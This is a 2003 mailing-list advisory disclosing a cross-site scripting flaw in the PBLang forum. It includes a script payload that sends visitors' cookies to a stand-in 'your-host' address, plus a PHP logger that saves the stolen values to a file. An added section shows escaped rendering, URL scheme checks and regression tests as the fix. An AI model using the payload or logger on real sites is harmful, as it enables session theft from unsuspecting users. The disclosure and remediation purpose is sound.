PBLang Forum XSS Vul

From: Quan Van Truong Bui (quan_vu_208cnat_private)
Date: Fri Jul 25 2003 - 05:54:11 PDT

    PBLang is a web forum written in PHP. A security vulnerability in the 
    product allows posting of HTML code and JavaScript into existing web 
    pages, causing it to be executed on the client end (a Cross-Site 
    Scripting vulnerability).
    
    |--------------------------------------------|
    
    Vulnerable systems: PBLang forum
    Version:   4.0 or lower
    Website: http://pblang.drmartinus.de/
    Problem: Cross Site Scripting (XSS)
    
    |--------------------------------------------|
    
    If someone inserts <script>`anyscript`</script> as the post's content, 
    the JavaScript code is executed by Internet Explorer or some other web 
    browsers. This allows stealing of cookie data and other interesting 
    things…
    
    Exploit:
    
    Inserting a new topic (or reply) with the following script will send the 
    visitor's cookies to your host. The output is saved to 
    http://your-host/cookie.txt
    
    *------------------------------------------------------------------------------
    
    <script>window.open("http://your-host/docs.php?docs="+escape(document.cookie), "subwindows", "height=100,width=486")</script>
    
    ------------------------------------------------------------------------------*
    
    Or insert any scripts – Java and HTML (e.g. javascript:history.go(-1), 
    window.write('Hello world'), javascript:alert('Hi!!!')… )
    
    
    * Code of docs.php:*
    
    *-------------------------------------------------docs.php-------------------------------------------------
    <?php
    //Copyright by W_Hat (www.pcworldvn.com)
    define ("LINE", "\r\n");
    define ("HTML_LINE", "<br>");
    
    // Print every key/value pair of $arr to the page and return the same
    // text (with plain line endings) for writing to the log file.
    function getvars($arr, $title)
    {
        $res = "";
        $len = count($arr);
        if ($len > 0)
        {
            if (strlen($title) > 0)
            {
                print("[--------$title--------]" . HTML_LINE);
                $res .= "[--------$title--------]" . LINE;
            }
            foreach ($arr as $key => $value)
            {
                print("[$key]" . HTML_LINE);
                print($arr[$key] . HTML_LINE);
                $res .= "[$key]" . LINE . $arr[$key] . LINE;
            }
        }
        return $res;
    }
    
    // get current date
    $now = date("Y-m-d H:i:s");
    // init: one timestamped record per request
    $myData = "[-----$now-----]" . LINE;
    // get: every GET parameter, i.e. the docs= value sent by the script
    $myData .= getvars($HTTP_GET_VARS, "");
    // file: named after the requesting client's address, opened for append
    $file = $REMOTE_ADDR . "cookie.txt";
    $mode = "r+";
    if (!file_exists($file))
        $mode = "w+";
    $fp = fopen ($file, $mode);
    fseek($fp, 0, SEEK_END);
    fwrite($fp, $myData);
    fclose($fp);
    ?>
    -------------------------------------------------docs.php-------------------------------------------------*
    
    
    Name: Quan Van Truong
    E-Mail: quan_vu_208cnat_private
    Occupation: Bug Hunter
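The root cause described above is post content being written into the page without output encoding. The following is an added illustration, not PBLang's code: a raw-echo renderer beside an escaped one, plus the scheme check that also covers the javascript: URLs the post mentions. Function names (render_post_unsafe, render_post_safe, h, safe_href) are hypothetical.

```php
<?php
// Added illustration, not PBLang code. It shows why the advisory's payload
// runs (the post body is echoed raw) and the output-encoding fix. Function
// names are hypothetical.

// Vulnerable pattern: the stored post body goes straight into the HTML.
function render_post_unsafe(string $author, string $body): string
{
    return "<div class=\"post\"><b>$author</b><p>$body</p></div>";
}

// Escape every user-controlled value at output time. ENT_QUOTES covers
// both quote styles so the result is also safe inside attributes.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: escape first, then add presentational line breaks.
function render_post_safe(string $author, string $body): string
{
    return '<div class="post"><b>' . h($author) . '</b><p>'
        . nl2br(h($body)) . '</p></div>';
}

// The advisory also lists javascript: URLs; only allow known schemes in href.
function safe_href(string $url): string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? h($url) : '#';
}

// Constructed sample post, shaped like the payload quoted in the advisory.
$payload = '<script>window.open("http://your-host/docs.php?docs="'
    . '+escape(document.cookie))</script>';

echo render_post_unsafe('guest', $payload), "\n"; // <script> reaches the browser
echo render_post_safe('guest', $payload), "\n";   // shown as &lt;script&gt; text

// Regression checks a forum maintainer can keep in the test suite.
assert(strpos(render_post_safe('guest', $payload), '<script') === false);
assert(safe_href('javascript:alert(1)') === '#');
assert(safe_href('http://pblang.drmartinus.de/') === 'http://pblang.drmartinus.de/');
```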
    



    This archive was generated by hypermail 2b30 : Fri Jul 25 2003 - 10:35:58 PDT